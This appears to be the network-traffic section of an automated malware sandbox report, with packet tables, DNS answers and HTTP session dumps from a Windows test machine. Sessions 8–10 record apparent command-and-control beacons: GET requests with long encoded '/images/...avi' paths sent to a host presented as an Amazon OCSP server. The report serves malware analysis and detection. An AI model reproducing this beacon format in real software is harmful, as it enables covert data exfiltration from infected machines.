                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402525902 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402580023 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402635098 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402729034 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402751923 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402765036 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402770042 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402772903 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402776003 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402779102 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402781963 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402812958 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402836084 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.402838945 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437493086 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437500000 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437520027 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437530994 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437535048 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437537909 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437541008 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437544107 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437546968 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437550068 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437553883 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437563896 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437608004 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437623024 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437719107 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437721014 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437736034 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437781096 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437807083 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437915087 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.437969923 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438008070 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438019991 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438021898 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438023090 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438038111 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438074112 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438081980 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438111067 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438167095 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438178062 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438261986 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438275099 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438343048 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438366890 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438378096 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438395977 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438427925 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438436031 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438483953 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438489914 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438533068 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438540936 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438591003 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438597918 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438615084 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438647032 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438703060 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438714981 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438723087 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438781977 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438791037 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438796043 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438808918 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438843966 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438869953 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438878059 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438934088 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438940048 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438955069 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.438991070 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439018011 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439023972 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439065933 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439074039 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439125061 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439131975 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439212084 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439229012 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439306021 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439316988 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439361095 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439415932 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439421892 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439431906 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439440012 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439464092 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439486027 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439492941 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439542055 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439548016 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439562082 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439589024 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439627886 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439635992 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439680099 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439685106 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439694881 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439724922 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439752102 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439759016 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439805984 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439810038 CEST49779443192.168.2.787.248.118.23
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439819098 CEST4434977987.248.118.23192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:11:43.439846039 CEST49779443192.168.2.787.248.118.23

                                                                                                                                                                                                                                  UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:16.857801914 CEST53585428.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:17.198149920 CEST5917953192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:17.243729115 CEST53591798.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:17.332115889 CEST6092753192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:17.365434885 CEST53609278.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:17.749300003 CEST5785453192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:17.787192106 CEST53578548.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:18.122560978 CEST6202653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:18.158761978 CEST53620268.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:18.935151100 CEST5945353192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:18.960432053 CEST53594538.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:19.434587002 CEST6246853192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:19.470165968 CEST53624688.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:19.948113918 CEST5256353192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:19.980835915 CEST5472153192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:19.981103897 CEST53525638.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:20.015856981 CEST53547218.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:20.349188089 CEST6282653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:20.381629944 CEST53628268.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:23.877279997 CEST6204653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:23.910409927 CEST53620468.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:31.496931076 CEST5122353192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:31.529613018 CEST53512238.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:39.038230896 CEST6390853192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:39.086754084 CEST53639088.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:42.676321030 CEST4922653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:42.704711914 CEST53492268.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:43.679935932 CEST4922653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:43.717204094 CEST53492268.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:44.695359945 CEST4922653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:44.724488974 CEST53492268.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:46.695827961 CEST4922653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:46.726485968 CEST53492268.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:50.702300072 CEST4922653192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:50.729746103 CEST53492268.8.8.8192.168.2.7
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.486399889 CEST6021253192.168.2.78.8.8.8
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.523144007 CEST53602128.8.8.8192.168.2.7

                                                                                                                                                                                                                                  DNS Queries


                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                  Sep 10, 2021 11:13:53.523144007 CEST8.8.8.8192.168.2.70x8f1dNo error (0)ocsp.sca1b.amazontrust.com13.225.29.204A (IP address)IN (0x0001)

HTTP Request Dependency Graph

• https:
  • geolocation.onetrust.com
  • btloader.com
  • ad-delivery.net
  • ad.doubleclick.net
  • img.img-taboola.com
  • s.yimg.com
• ocsp.sca1b.amazontrust.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49722 | 104.20.184.68 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49741 | 172.67.70.134 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.7 | 49938 | 13.225.29.191 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Sep 10, 2021 11:13:53.557956934 CEST | 9349 | OUT | GET /images/1mUl4vSxMxI/e7HhiI3PfruX2m/qXVt2BLImZpNU2AUWYoPx/KJXoqE51DtcFrNZ_/2BgDE50_2B2je1s/48lZWMnPdCpHd_2FFy/Vcq64rYip/9aN0bRvWizmkP5fXR2T3/jiHfK2wSGdTtZ8VP53I/SUMESuf_2FBQAkd3zXxfOT/_2BcxECgxKRoa/s8ZW5dhr/E0BgSy4u3Bh6HSi/j.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ocsp.sca1b.amazontrust.com
Connection: Keep-Alive
Sep 10, 2021 11:13:53.630445957 CEST | 9350 | IN | HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 5
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: public, max-age=300
Date: Fri, 10 Sep 2021 09:13:53 GMT
ETag: "5f457bf9-5"
Last-Modified: Tue, 25 Aug 2020 21:00:41 GMT
Server: nginx
X-Cache: Miss from cloudfront
Via: 1.1 d6561aeeccb210202cf78b99f07c5235.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: CDG3-C2
X-Amz-Cf-Id: Y2asqiIbkdpLT9kwUSjepiCbellJIyyeH7zilJnIOwH8uTto15iFhw==
Data Raw: 30 03 0a 01 06
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.7 | 49748 | 104.26.2.70 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.7 | 49745 | 172.217.19.102 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.7 | 49776 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.7 | 49777 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.7 | 49779 | 87.248.118.23 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.7 | 49778 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.7 | 49824 | 13.225.29.191 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Sep 10, 2021 11:12:31.213751078 CEST | 4515 | OUT | GET /images/ljDNkkzbV4a6qGMM6/1HExUGmQXVwO/frwWBEjdrZ4/d5S8UlSiYa0DzX/el9J2qXVIUyYCxMHHr91X/kizLttMGapdo5SvF/olXlCBP7aPqDsmB/ICQ2HKBamF1i_2Fxdj/ZsDmjnqFK/ytn9Ymr2xJl5Qy4kiXVc/IQDWlUGPzShrNYAjXzf/JPSl_2BD7pWwAJFNY_2B0f/3A3oDAh_2BF9_/2BxYBJaFI/UpWol9RI.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ocsp.sca1b.amazontrust.com
Connection: Keep-Alive
Sep 10, 2021 11:12:31.288043022 CEST | 4516 | IN | HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 5
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: public, max-age=300
Date: Fri, 10 Sep 2021 09:12:31 GMT
ETag: "5f4e9b09-5"
Last-Modified: Tue, 01 Sep 2020 19:03:37 GMT
Server: nginx
X-Cache: Miss from cloudfront
Via: 1.1 2be4364c1cde74eab64cab67d1de266a.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: CDG3-C2
X-Amz-Cf-Id: MAnAQl6oQ_k3rudXg0GsdUucATlJ8h94qmkZbcwfTFgp9-FzglyMjw==
Data Raw: 30 03 0a 01 06
Data Ascii: 0
Sep 10, 2021 11:13:28.241213083 CEST | 9339 | OUT | GET /images/pHWWVyKJpE2g/nNZcTMutRbw/CCuOk7RvdVCDGz/STh4ftwA407S9VDDkvBy4/G7M_2BJ4E2bGBbf7/N4t3UKgsWntjM7M/mhCOIjxjlHyX4RUX7Q/Rdq3ib1hF/2fWqDSaJ9GA2yVZ_2Bgz/9iFlTX9OFyKHKxrjQJU/JYzhGNAUNkUKgLpHHU6bLf/nZUT_2BcMHeCkKwcWj/aMt.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: ocsp.sca1b.amazontrust.com
Connection: Keep-Alive
Sep 10, 2021 11:13:28.532047033 CEST | 9340 | IN | HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 5
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: public, max-age=300
Date: Fri, 10 Sep 2021 09:13:28 GMT
ETag: "5fac0ccd-5"
Last-Modified: Wed, 11 Nov 2020 16:09:49 GMT
Server: nginx
X-Cache: Miss from cloudfront
Via: 1.1 2be4364c1cde74eab64cab67d1de266a.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: CDG3-C2
X-Amz-Cf-Id: Hxf_sKJ3QnNKAKWf4poB6n0NLhGcqxRChXoaoe_aJ8EDSwQu5tW5Ww==
Data Raw: 30 03 0a 01 06
Data Ascii: 0


                                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                                                                                  9 | 192.168.2.7 | 49887 | 13.225.29.191 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.069914103 CEST | 8413 | OUT | GET /images/cCdYQdt2tX8RhHk/neYfmVtOu_2BWHOxaX/ecV9VJIhq/XE4M5D_2FzTYipgQVzFy/24_2BtaWyVjXI2M_2FX/wa66wgzPqWCXC0kGRqyEUL/snesyfGZeTgvJ/569YwYUH/U86MzznZ70JhRKq9sWcaTd1/Hzb_2FFW0u/GZ5sESPD_2B5JLMQh/7K5kxREyrQ1n/mKmdzEvi70Tv5/6xorN.avi HTTP/1.1
                                                                                                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: ocsp.sca1b.amazontrust.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Sep 10, 2021 11:13:13.362699986 CEST | 8414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/ocsp-response
                                                                                                                                                                                                                                  Content-Length: 5
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Cache-Control: public, max-age=300
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:13:13 GMT
                                                                                                                                                                                                                                  ETag: "5fac0ccd-5"
                                                                                                                                                                                                                                  Last-Modified: Wed, 11 Nov 2020 16:09:49 GMT
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                  Via: 1.1 8513b0b4c77c9a98d13a007d589042ff.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                  X-Amz-Cf-Pop: CDG3-C2
                                                                                                                                                                                                                                  X-Amz-Cf-Id: RxQRFlS4KfsoP9UGBcMybusB3Bs7Tpc7zJpb7ocQOWv42p9ezWXwrg==
                                                                                                                                                                                                                                  Data Raw: 30 03 0a 01 06
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                                                                                  0 | 192.168.2.7 | 49722 | 104.20.184.68 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                                                                  2021-09-10 09:11:38 UTC | 0 | OUT | GET /cookieconsentpub/v1/geo/location HTTP/1.1
                                                                                                                                                                                                                                  Accept: application/javascript, */*;q=0.8
                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: geolocation.onetrust.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  2021-09-10 09:11:38 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Fri, 10 Sep 2021 09:11:38 GMT
                                                                                                                                                                                                                                  Content-Type: text/javascript
                                                                                                                                                                                                                                  Content-Length: 182
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 68c787b23fe597f6-FRA
                                                                                                                                                                                                                                  2021-09-10 09:11:38 UTC | 0 | IN | Data Raw: 6a 73 6f 6e 46 65 65 64 28 7b 22 63 6f 75 6e 74 72 79 22 3a 22 43 48 22 2c 22 73 74 61 74 65 22 3a 22 5a 48 22 2c 22 73 74 61 74 65 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 63 6f 64 65 22 3a 22 38 31 35 32 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 34 33 30 30 30 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 35 37 31 38 30 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 45 55 22 7d 29 3b
                                                                                                                                                                                                                                  Data Ascii: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});


                                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                                                                                  1 | 192.168.2.7 | 49741 | 172.67.70.134 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                                                                  2021-09-10 09:11:39 UTC | 0 | OUT | GET /tag?o=6208086025961472&upapi=true HTTP/1.1
                                                                                                                                                                                                                                  Accept: application/javascript, */*;q=0.8
                                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  Host: btloader.com
                                                                                                                                                                                                                                  Connection: Keep-Alive
